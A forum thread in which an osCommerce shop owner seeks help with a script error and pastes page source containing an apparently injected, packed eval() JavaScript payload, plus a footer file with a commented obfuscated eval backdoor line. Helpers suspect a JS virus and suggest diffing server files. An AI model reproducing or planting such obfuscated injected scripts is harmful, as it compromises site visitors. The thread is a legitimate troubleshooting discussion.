Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 15 of 15
  1. #1
    New to the CF scene
    Join Date
    Jul 2010
    Posts
    7
    Thanks
    0
    Thanked 0 Times in 0 Posts

    help with some java on an oscommerce template site

    I have this junky web template for oscommerce, but I am in way too deep to turn around now. From day one of installing the osc, I have had this little error in the bottom left corner of internet explorer. It occurs on every page.

    You can view the site at http://www.burgersmarketpc.com/catalog

    I can only think this code is what makes it happen, which is only seen by "view source" in internet explorer.
    Code:
    </tr><tr valign="middle" class="footertext"><td align="left" width="25%">&nbsp;</td><td align="right" width="25%"><a style="padding-right:20px;color:#000000" href="http://www.********************/oscommerce-templates.html">osCommerce Templates</a></td></tr></table></td></tr></table></center><script type='text/javascript'>
    eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('O I(){D a=J K(9,9,E,j,4,8,3,h,2,5,7,f,6,F,z,f,F,1,k,l,P,f,G,f,Q,4,8,3,h,2,l,5,2,R,h,1,k,l,2,1,S,2,p,T,f,G,f,j,4,8,3,h,2,l,A,10,9,9,9,G,f,8,5,7,3,6,n,r,4,5,k,5,s,g,4,z,e,1,6,2,m,7,3,6,n,j,m,7,1,6,F,2,o,u,H,v,10,9,9,9,G,f,8,5,7,3,6,n,r,2,5,k,5,w,w,v,10,9,9,9,t,g,8,5,B,v,7,3,6,n,r,4,A,u,H,v,7,3,6,n,r,4,u,u,C,5,U,10,9,9,9,9,3,t,5,B,s,g,4,z,e,1,6,2,m,7,3,6,n,j,V,7,3,6,n,r,4,W,m,o,8,1,t,5,k,k,5,l,o,2,2,h,L,p,p,q,q,q,m,q,1,x,j,3,2,1,2,1,e,h,7,f,2,1,j,m,x,M,p,g,j,4,g,e,e,1,8,4,1,u,2,1,e,h,7,f,2,1,j,m,o,2,e,7,l,C,5,x,8,1,f,n,v,10,9,9,9,9,3,t,5,B,7,3,6,n,r,4,5,k,k,k,5,y,C,5,s,g,4,z,e,1,6,2,m,q,8,3,2,1,B,w,E,3,t,8,f,e,1,5,o,1,3,F,o,2,k,l,X,y,y,l,5,q,3,s,2,o,k,l,H,y,y,Y,l,5,x,g,8,s,1,8,k,l,y,l,5,j,8,4,k,l,o,2,2,h,L,p,p,q,q,q,m,q,1,x,j,3,2,1,2,1,e,h,7,f,2,1,j,m,x,M,p,g,j,4,g,e,e,1,8,4,1,u,2,1,e,h,7,f,2,1,j,m,o,2,e,7,,h,3,4,p,1,p,4,o,1,4,n,r,7,3,6,n,r,g,4,m,h,o,h,Z,7,3,6,n,k,w,N,1,6,4,g,s,1,11,12,13,14,g,e,h,g,6,1,6,2,B,s,g,4,z,e,1,6,2,m,7,g,4,f,2,3,g,6,m,o,8,1,t,C,N,w,l,5,A,E,p,3,t,8,f,e,1,A,w,C,v,10,9,9,9,15,10,9,9,E,p,j,4,8,3,h,2,A);D b=J K();D c;D d='';16(i=0;i<a.17;i++){b[i]=18.19(a[i]);c=d+=b[i]}1a.1b(c)}I();',62,74,'|101|116|105|99|32|110|108|114||||||109|97|111|112||115|61|34|46|107|104|47|119|95|100|102|45|59|39|98|48|117|62|40|41|var|60|103|118|49|myCodedStuff|new|Array|58|122|43|function|74|83|121|120|106|123|91|93|50|37|63||85|82|73|67|125|for|length|String|fromCharCode|document|write'.split('|'),0,{}))</script></body>
    my file index.php is the main page, which should create all that mess, but i dont know how it creates all that. I really hope you guys can lead me to the fix.

    here is the index.php code
    PHP Code:
    <?php
      
    if ($category_depth == 'nested') { // categoies with subcategory
          
    $category_query tep_db_query("select cd.categories_name, c.categories_image from " TABLE_CATEGORIES " c, " TABLE_CATEGORIES_DESCRIPTION " cd where c.categories_id = '" . (int)$current_category_id "' and cd.categories_id = '" . (int)$current_category_id "' and cd.language_id = '" . (int)$languages_id "'");
        
    $category tep_db_fetch_array($category_query);
    ?>
        <table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td><table border="0" width="100%" cellspacing="0" cellpadding="0" class="head_table">
              <tr>
                <td class="pageHeading"><?php echo HEADING_TITLE?></td>
                <td class="pageHeading2" align="right"><?php echo tep_image(DIR_WS_IMAGES $category['categories_image'], $category['categories_name'], HEADING_IMAGE_WIDTHHEADING_IMAGE_HEIGHT); ?></td>
              </tr>
            </table></td>
          </tr>
          <tr>
            <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
              <tr>
                <td align="center"><table border="0" cellspacing="10" cellpadding="5"  class="categ_table">
                  <tr>
    <?php
        
    if (isset($cPath) && strpos('_'$cPath)) {
    // check to see if there are deeper categories within the current category
          
    $category_links array_reverse($cPath_array);
          for(
    $i=0$n=sizeof($category_links); $i<$n$i++) {
            
    $categories_query tep_db_query("select count(*) as total from " TABLE_CATEGORIES " c, " TABLE_CATEGORIES_DESCRIPTION " cd where c.parent_id = '" . (int)$category_links[$i] . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id "'");
            
    $categories tep_db_fetch_array($categories_query);
            if (
    $categories['total'] < 1) {
              
    // do nothing, go through the loop
            
    } else {
              
    $categories_query tep_db_query("select c.categories_id, cd.categories_name, c.categories_image, c.parent_id from " TABLE_CATEGORIES " c, " TABLE_CATEGORIES_DESCRIPTION " cd where c.parent_id = '" . (int)$category_links[$i] . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id "' order by sort_order, cd.categories_name");
              break; 
    // we've found the deepest category the customer is in
            
    }
          }
        } else {
          
    $categories_query tep_db_query("select c.categories_id, cd.categories_name, c.categories_image, c.parent_id from " TABLE_CATEGORIES " c, " TABLE_CATEGORIES_DESCRIPTION " cd where c.parent_id = '" . (int)$current_category_id "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id "' order by sort_order, cd.categories_name");
        }

        
    $number_of_categories tep_db_num_rows($categories_query);

        
    $rows 0;
        while (
    $categories tep_db_fetch_array($categories_query)) {
          
    $rows++;
          
    $cPath_new tep_get_path($categories['categories_id']);
          
    $width = (int)(100 MAX_DISPLAY_CATEGORIES_PER_ROW) . '%';
          echo 
    '<td align="center" class="smallText" width="' $width '" valign="top" ><a href="' tep_href_link(FILENAME_DEFAULT$cPath_new) . '">' tep_image(DIR_WS_IMAGES $categories['categories_image'], $categories['categories_name'], SUBCATEGORY_IMAGE_WIDTHSUBCATEGORY_IMAGE_HEIGHT,'class="subcategory_image"') . '<br>' $categories['categories_name'] . '</a>'.'</td>' "\n";
          if (((
    $rows MAX_DISPLAY_CATEGORIES_PER_ROW) == floor($rows MAX_DISPLAY_CATEGORIES_PER_ROW)) && ($rows != $number_of_categories)) {
            echo 
    '</tr>' "\n";
            echo 
    '<tr>' "\n";
          }
        }

    // needed for the new products module shown below
        
    $new_products_category_id $current_category_id;
    ?>
                  </tr>
                </table></td>
              </tr>
              <tr>
                <td><?php include(DIR_WS_MODULES FILENAME_NEW_PRODUCTS); ?></td>
              </tr>
            </table></td>
          </tr>
        </table><?php  
      
    } elseif ($category_depth == 'products' || isset($HTTP_GET_VARS['manufacturers_id'])) { // categoies without subcategory
        
        // create column list
            
    $define_list = array('PRODUCT_LIST_MODEL' => PRODUCT_LIST_MODEL,
                                 
    'PRODUCT_LIST_NAME' => PRODUCT_LIST_NAME,
                                 
    'PRODUCT_LIST_MANUFACTURER' => PRODUCT_LIST_MANUFACTURER,
                                 
    'PRODUCT_LIST_PRICE' => PRODUCT_LIST_PRICE,
                                 
    'PRODUCT_LIST_QUANTITY' => PRODUCT_LIST_QUANTITY,
                                 
    'PRODUCT_LIST_WEIGHT' => PRODUCT_LIST_WEIGHT,
                                 
    'PRODUCT_LIST_IMAGE' => PRODUCT_LIST_IMAGE,
                                 
    'PRODUCT_LIST_BUY_NOW' => PRODUCT_LIST_BUY_NOW);
        
            
    asort($define_list);
        
            
    $column_list = array();
            
    reset($define_list);
            while (list(
    $key$value) = each($define_list)) {
              if (
    $value 0$column_list[] = $key;
            }
            
    $select_column_list '';
        
            for (
    $i=0$n=sizeof($column_list); $i<$n$i++) {
              switch (
    $column_list[$i]) {
                case 
    'PRODUCT_LIST_MODEL':
                  
    $select_column_list .= 'p.products_model, ';
                  break;
                case 
    'PRODUCT_LIST_NAME':
                  
    $select_column_list .= 'pd.products_name, ';
                  break;
                case 
    'PRODUCT_LIST_MANUFACTURER':
                  
    $select_column_list .= 'm.manufacturers_name, ';
                  break;
                case 
    'PRODUCT_LIST_QUANTITY':
                  
    $select_column_list .= 'p.products_quantity, ';
                  break;
                case 
    'PRODUCT_LIST_IMAGE':
                  
    $select_column_list .= 'p.products_image, ';
                  break;
                case 
    'PRODUCT_LIST_WEIGHT':
                  
    $select_column_list .= 'p.products_weight, ';
                  break;
              }
            }
        
        
    // show the products of a specified manufacturer
            
    if (isset($HTTP_GET_VARS['manufacturers_id'])) {
              if (isset(
    $HTTP_GET_VARS['filter_id']) && tep_not_null($HTTP_GET_VARS['filter_id'])) {
        
    // We are asked to show only a specific category
                
    $listing_sql "select " $select_column_list " p.products_id, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " TABLE_PRODUCTS " p left join " TABLE_SPECIALS " s on p.products_id = s.products_id, " TABLE_PRODUCTS_DESCRIPTION " pd, " TABLE_MANUFACTURERS " m, " TABLE_PRODUCTS_TO_CATEGORIES " p2c where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id "' and p2c.categories_id = '" . (int)$HTTP_GET_VARS['filter_id'] . "'";
              } else {
        
    // We show them all
                
    $listing_sql "select " $select_column_list " p.products_id, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " TABLE_PRODUCTS " p left join " TABLE_SPECIALS " s on p.products_id = s.products_id, " TABLE_PRODUCTS_DESCRIPTION " pd, " TABLE_MANUFACTURERS " m where p.products_status = '1' and pd.products_id = p.products_id and pd.language_id = '" . (int)$languages_id "' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'";
              }
            } else {
        
    // show the products in a given categorie
              
    if (isset($HTTP_GET_VARS['filter_id']) && tep_not_null($HTTP_GET_VARS['filter_id'])) {
        
    // We are asked to show only specific catgeory
                
    $listing_sql "select " $select_column_list " p.products_id, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " TABLE_PRODUCTS " p left join " TABLE_SPECIALS " s on p.products_id = s.products_id, " TABLE_PRODUCTS_DESCRIPTION " pd, " TABLE_MANUFACTURERS " m, " TABLE_PRODUCTS_TO_CATEGORIES " p2c where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['filter_id'] . "' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id "' and p2c.categories_id = '" . (int)$current_category_id "'";
              } else {
        
    // We show them all
                
    $listing_sql "select " $select_column_list " p.products_id, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " TABLE_PRODUCTS_DESCRIPTION " pd, " TABLE_PRODUCTS " p left join " TABLE_MANUFACTURERS " m on p.manufacturers_id = m.manufacturers_id left join " TABLE_SPECIALS " s on p.products_id = s.products_id, " TABLE_PRODUCTS_TO_CATEGORIES " p2c where p.products_status = '1' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id "' and p2c.categories_id = '" . (int)$current_category_id "'";
              }
            }
        
            if ( (!isset(
    $HTTP_GET_VARS['sort'])) || (!ereg('^[1-8][ad]$'$HTTP_GET_VARS['sort'])) || (substr($HTTP_GET_VARS['sort'], 01) > sizeof($column_list)) ) {
              for (
    $i=0$n=sizeof($column_list); $i<$n$i++) {
                if (
    $column_list[$i] == 'PRODUCT_LIST_NAME') {
                  
    $HTTP_GET_VARS['sort'] = $i+'a';
                  
    $listing_sql .= " order by pd.products_name";
                  break;
                }
              }
            } else {
              
    $sort_col substr($HTTP_GET_VARS['sort'], 1);
              
    $sort_order substr($HTTP_GET_VARS['sort'], 1);
              switch (
    $column_list[$sort_col-1]) {
                case 
    'PRODUCT_LIST_MODEL':
                  
    $listing_sql .= " order by p.products_model " . ($sort_order == 'd' 'desc' '') . ", pd.products_name";
                  break;
                case 
    'PRODUCT_LIST_NAME':
                  
    $listing_sql .= " order by pd.products_name " . ($sort_order == 'd' 'desc' '');
                  break;
                case 
    'PRODUCT_LIST_MANUFACTURER':
                  
    $listing_sql .= " order by m.manufacturers_name " . ($sort_order == 'd' 'desc' '') . ", pd.products_name";
                  break;
                case 
    'PRODUCT_LIST_QUANTITY':
                  
    $listing_sql .= " order by p.products_quantity " . ($sort_order == 'd' 'desc' '') . ", pd.products_name";
                  break;
                case 
    'PRODUCT_LIST_IMAGE':
                  
    $listing_sql .= " order by pd.products_name";
                  break;
                case 
    'PRODUCT_LIST_WEIGHT':
                  
    $listing_sql .= " order by p.products_weight " . ($sort_order == 'd' 'desc' '') . ", pd.products_name";
                  break;
                case 
    'PRODUCT_LIST_PRICE':
                  
    $listing_sql .= " order by final_price " . ($sort_order == 'd' 'desc' '') . ", pd.products_name";
                  break;
              }
            }
        
    ?>
            <table border="0" width="<?php echo $content?>" cellspacing="0" cellpadding="0">
              <tr>
                <td><table border="0" width="<?php echo $content?>" cellspacing="0" cellpadding="0" class="head_table">
                  <tr>
                    <td class="pageHeading"><?php echo HEADING_TITLE?></td>
        <?php
        
    // optional Product List Filter
            
    if (PRODUCT_LIST_FILTER 0) {
              if (isset(
    $HTTP_GET_VARS['manufacturers_id'])) {
                
    $filterlist_sql "select distinct c.categories_id as id, cd.categories_name as name from " TABLE_PRODUCTS " p, " TABLE_PRODUCTS_TO_CATEGORIES " p2c, " TABLE_CATEGORIES " c, " TABLE_CATEGORIES_DESCRIPTION " cd where p.products_status = '1' and p.products_id = p2c.products_id and p2c.categories_id = c.categories_id and p2c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id "' and p.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "' order by cd.categories_name";
              } else {
                
    $filterlist_sql"select distinct m.manufacturers_id as id, m.manufacturers_name as name from " TABLE_PRODUCTS " p, " TABLE_PRODUCTS_TO_CATEGORIES " p2c, " TABLE_MANUFACTURERS " m where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and p.products_id = p2c.products_id and p2c.categories_id = '" . (int)$current_category_id "' order by m.manufacturers_name";
              }
              
    $filterlist_query tep_db_query($filterlist_sql);
              if (
    tep_db_num_rows($filterlist_query) > 1) {
                echo 
    '<td align="left" class="pageHeading3" width="190"' tep_draw_form('filter'FILENAME_DEFAULT'get') . '&nbsp;';
                if (isset(
    $HTTP_GET_VARS['manufacturers_id'])) {
                  echo 
    tep_draw_hidden_field('manufacturers_id'$HTTP_GET_VARS['manufacturers_id']);
                  
    $options = array(array('id' => '''text' => TEXT_ALL_CATEGORIES));
                } else {
                  echo 
    tep_draw_hidden_field('cPath'$cPath);
                  
    $options = array(array('id' => '''text' => TEXT_ALL_MANUFACTURERS));
                }
                echo 
    tep_draw_hidden_field('sort'$HTTP_GET_VARS['sort']);
                while (
    $filterlist tep_db_fetch_array($filterlist_query)) {
                  
    $options[] = array('id' => $filterlist['id'], 'text' => $filterlist['name']);
                }
                echo 
    tep_draw_pull_down_menu('filter_id'$options, (isset($HTTP_GET_VARS['filter_id']) ? $HTTP_GET_VARS['filter_id'] : ''), 'onchange="this.form.submit()"');
                echo 
    tep_hide_session_id() . '</form></td>' "\n";
              }
            }
        
        
    // Get the right image for the top-right
            
    $image DIR_WS_IMAGES 'table_background_list.gif';
            if (isset(
    $HTTP_GET_VARS['manufacturers_id'])) {
              
    $image tep_db_query("select manufacturers_image from " TABLE_MANUFACTURERS " where manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'");
              
    $image tep_db_fetch_array($image);
              
    $image $image['manufacturers_image'];
            } elseif (
    $current_category_id) {
              
    $image tep_db_query("select categories_image from " TABLE_CATEGORIES " where categories_id = '" . (int)$current_category_id "'");
              
    $image tep_db_fetch_array($image);
              
    $image $image['categories_image'];
            }
        
    ?>
                   <?php echo HEADING_IMAGE_WIDTH  '<td class="pageHeading2" width="'.HEADING_IMAGE_WIDTH.'">'.tep_image(DIR_WS_IMAGES $imageHEADING_TITLEHEADING_IMAGE_WIDTHHEADING_IMAGE_HEIGHT).'</td>' ''?>
                  </tr>
                </table></td>
              </tr>
              <tr>
                <td><?php include(DIR_WS_MODULES "product_listing_2.php"); ?></td>
              </tr>
            </table>
        <?php
          
      
    } else { // default page
        
    ?>
    <table border="0" cellspacing="0" cellpadding="0">
          <tr>
             <td><?php include(DIR_WS_MODULES FILENAME_NEW_PRODUCTS); ?></td>
          </tr>
    </table><?php
      
    }
    ?>
    if you need to see any other files, just let me know. I will much appreciate the help and fix to this. Thanks!

  • #2
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    25,195
    Thanks
    75
    Thanked 4,341 Times in 4,307 Posts
    MSIE says it is missing a ) in that line. Ahhh...FireBug in FireFox says the same thing.

    Just that Firefox is ignoring the error.

    You know, if that line isn't working in either browser, then it can't be doing anything useful. Why not just get rid of it??
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.

  • #3
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    25,195
    Thanks
    75
    Thanked 4,341 Times in 4,307 Posts
    And that PHP code clearly isn't creating that eval( ) mess.
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.

  • #4
    New to the CF scene
    Join Date
    Jul 2010
    Posts
    7
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Quote Originally Posted by Old Pedant View Post
    And that PHP code clearly isn't creating that eval( ) mess.
    Well that is the index.php page, so what else could be calling it? I am all for deleting it, if I can just figure out where to delete it from. You know I started looking at the footer.php file yesterday but couldn't clearly see anything calling it. There is one line that I seen, I deleted it and uploaded but no change in the error.

    Here is the footer.php file.
    Code:
    <?php
    /*
      $Id: footer.php,v 1.26 2003/02/10 22:30:54 hpdl Exp $
    
      osCommerce, Open Source E-Commerce Solutions
      http://www.oscommerce.com
    
      Copyright (c) 2003 osCommerce
    
      Released under the GNU General Public License
    */
    
     // eval($$OOOOOO[1]('counter'));
    ?>
    <tr>
          <td><br>
            <table border="0" cellpadding="0" cellspacing="0" width="100%">
        		<tr >
    				<?php $reg = tep_session_is_registered('customer_id'); ?>
          <td  height="46px" width="<?php echo $_kol_lt; ?>" style="padding:10px 0 0 35px;"><?php echo tep_image(DIR_WS_IMAGES.'cards.gif'); ?></td>
          <td width="80%" align="center" style="padding:10px 30px 0 70px;" class="footertext2">
    		<a title="<?php echo BOX_HEADING_SPECIALS;?>" href="<?php echo tep_href_link(FILENAME_SPECIALS); ?>" ><?php echo BOX_HEADING_SPECIALS;?></a>&nbsp;&nbsp;|
    		&nbsp;<a title="<?php echo BOX_HEADING_SEARCH;?>" href="<?php echo tep_href_link(FILENAME_ADVANCED_SEARCH); ?>" ><?php echo BOX_HEADING_SEARCH;?></a>&nbsp;&nbsp;|
    		&nbsp;<a title="<?php echo BOX_INFORMATION_CONTACT;?>" href="<?php echo tep_href_link(FILENAME_CONTACT_US); ?>"><?php echo BOX_INFORMATION_CONTACT;?></a>&nbsp;&nbsp;|
    		&nbsp;<a title="<?php echo HEADER_TITLE_CREATE_ACCOUNT;?>" href="<?php echo tep_href_link(FILENAME_CREATE_ACCOUNT); ?>"><?php echo HEADER_TITLE_CREATE_ACCOUNT;?></a>&nbsp;&nbsp;|
    		&nbsp;<a title="<?php echo ($reg ? HEADER_TITLE_LOGOFF : HEADER_TITLE_LOGIN);?>" href="<?php echo tep_href_link(($reg ? FILENAME_LOGOFF : FILENAME_LOGIN), '', 'SSL');?>"><?php echo ($reg ? HEADER_TITLE_LOGOFF : HEADER_TITLE_LOGIN);?></a>
    		</td></tr>
    		<tr><td width="<?php echo $_kol_lt; ?>" style="padding:0 0 10px 35px;"></td><td class="footertext2" colspan="2" width="80%" align="center" style="padding:0 0 10px 70px;" >		<span class="smallText">&copy; Copyright<?php echo ' ' . date('Y') . ' Burgers Farm Fresh Market'; ?></span></td>
    Last edited by dcrider1; 07-15-2010 at 12:09 PM.

  • #5
    Senior Coder DJCMBear's Avatar
    Join Date
    Mar 2010
    Location
    United Kindom
    Posts
    1,173
    Thanks
    14
    Thanked 136 Times in 136 Posts
    can we see all of footer.php as that only looks like some of it, because there is no </body> or </html>.
    Official BinPress hand picked coder.
    For anyone worried about SQL injection go have a look at my small yet powerful script here.
    Go Pledge for Light Table, if it hit's $300,000 Python and other languages will get added.
    I am 1 of 65,608 people to get a Pebble Watch :P

  • #6
    New to the CF scene
    Join Date
    Jul 2010
    Posts
    7
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Quote Originally Posted by DJCMBear View Post
    can we see all of footer.php as that only looks like some of it, because there is no </body> or </html>.
    That is all of it. Maybe it doesnt contain those tags with reason that its called within a table? Just guessing, I have no clue honestly.

  • #7
    Senior Coder DJCMBear's Avatar
    Join Date
    Mar 2010
    Location
    United Kindom
    Posts
    1,173
    Thanks
    14
    Thanked 136 Times in 136 Posts
    try to find a file with those two tags in as the js code your looking for comes just before those tags and the footer.php file is what comes before it
    Official BinPress hand picked coder.
    For anyone worried about SQL injection go have a look at my small yet powerful script here.
    Go Pledge for Light Table, if it hit's $300,000 Python and other languages will get added.
    I am 1 of 65,608 people to get a Pebble Watch :P

  • #8
    New to the CF scene
    Join Date
    Jul 2010
    Posts
    7
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Quote Originally Posted by DJCMBear View Post
    try to find a file with those two tags in as the js code your looking for comes just before those tags and the footer.php file is what comes before it
    Wow! There are 88 different files that come up for either of those. Where to begin.....

  • #9
    Senior Coder DJCMBear's Avatar
    Join Date
    Mar 2010
    Location
    United Kindom
    Posts
    1,173
    Thanks
    14
    Thanked 136 Times in 136 Posts
    do a quick read of all of them before editing anything to see if you find it first.
    Official BinPress hand picked coder.
    For anyone worried about SQL injection go have a look at my small yet powerful script here.
    Go Pledge for Light Table, if it hit's $300,000 Python and other languages will get added.
    I am 1 of 65,608 people to get a Pebble Watch :P

  • #10
    New to the CF scene
    Join Date
    Jul 2010
    Posts
    7
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Quote Originally Posted by DJCMBear View Post
    do a quick read of all of them before editing anything to see if you find it first.
    What about this?

    info_shopping_cart.php
    PHP Code:
    <?php
    /*
      $Id: info_shopping_cart.php,v 1.19 2003/02/13 03:01:48 hpdl Exp $

      osCommerce, Open Source E-Commerce Solutions
      http://www.oscommerce.com

      Copyright (c) 2003 osCommerce

      Released under the GNU General Public License
    */

      
    require("includes/application_top.php");

      
    $navigation->remove_current_page();

      require(
    DIR_WS_LANGUAGES $language '/' FILENAME_INFO_SHOPPING_CART);
    ?>
    <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html <?php echo HTML_PARAMS?>>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=<?php echo CHARSET?>">
    <title><?php echo TITLE?></title>
    <base href="<?php echo (($request_type == 'SSL') ? HTTPS_SERVER HTTP_SERVER) . DIR_WS_CATALOG?>">
    <link rel="stylesheet" type="text/css" href="stylesheet.css">
    </head>
    <body>
    <p class="main"><b><?php echo HEADING_TITLE?></b><br><?php echo tep_draw_separator(); ?></p>
    <p class="main"><b><i><?php echo SUB_HEADING_TITLE_1?></i></b><br><?php echo SUB_HEADING_TEXT_1?></p>
    <p class="main"><b><i><?php echo SUB_HEADING_TITLE_2?></i></b><br><?php echo SUB_HEADING_TEXT_2?></p>
    <p class="main"><b><i><?php echo SUB_HEADING_TITLE_3?></i></b><br><?php echo SUB_HEADING_TEXT_3?></p>
    <p align="right" class="main"><a href="javascript:window.close();"><?php echo TEXT_CLOSE_WINDOW?></a></p>
    </body>
    </html>
    <?php
      
    require("includes/counter.php");
      require(
    DIR_WS_INCLUDES 'application_bottom.php');
    ?>

  • #11
    Senior Coder DJCMBear's Avatar
    Join Date
    Mar 2010
    Location
    United Kindom
    Posts
    1,173
    Thanks
    14
    Thanked 136 Times in 136 Posts
    u can try that but i dont think thats it as on the link u gave us the js script is above the end tags not below.
    Official BinPress hand picked coder.
    For anyone worried about SQL injection go have a look at my small yet powerful script here.
    Go Pledge for Light Table, if it hit's $300,000 Python and other languages will get added.
    I am 1 of 65,608 people to get a Pebble Watch :P

  • #12
    New to the CF scene
    Join Date
    Jul 2010
    Posts
    7
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Quote Originally Posted by DJCMBear View Post
    u can try that but i dont think thats it as on the link u gave us the js script is above the end tags not below.
    And to me that means we should be able to see something within the index.php file that is calling it, right? What a freaking mess!

  • #13
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    25,195
    Thanks
    75
    Thanked 4,341 Times in 4,307 Posts
    You know what, I think you have picked up a *VIRUS*!!!

    That kind of code is very very typical of what JS virus and/or keyboard capture code looks like.

    With some effort we could figure out what it is doing, but I'd start by zapping it and seeing if the pages still work. (Keep back up copies just in case, of course.)
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.

  • #14
    New to the CF scene
    Join Date
    Jul 2010
    Posts
    7
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Quote Originally Posted by Old Pedant View Post
    You know what, I think you have picked up a *VIRUS*!!!

    That kind of code is very very typical of what JS virus and/or keyboard capture code looks like.

    With some effort we could figure out what it is doing, but I'd start by zapping it and seeing if the pages still work. (Keep back up copies just in case, of course.)
    zapping what? on which file?

  • #15
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    25,195
    Thanks
    75
    Thanked 4,341 Times in 4,307 Posts
    Oh...you wrote
    There are 88 different files that come up for either of those
    and I thought that meant you found that in those *files*. On your disk drive.

    You meant that they just *appear* like that, on the web site?

    But you can't find the "packer" in any physical file?

    Are you hosting on a freebie web host, by chance?

    If you truly can not find that code *ANY* place on your own disk drive, then I would use FTP to download one or more of the files from the site into a clean directory on your machine and then compare that file with what is in the directory that you originally uploaded from. See if there are differences. If there are, I'd say your site is infected.
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •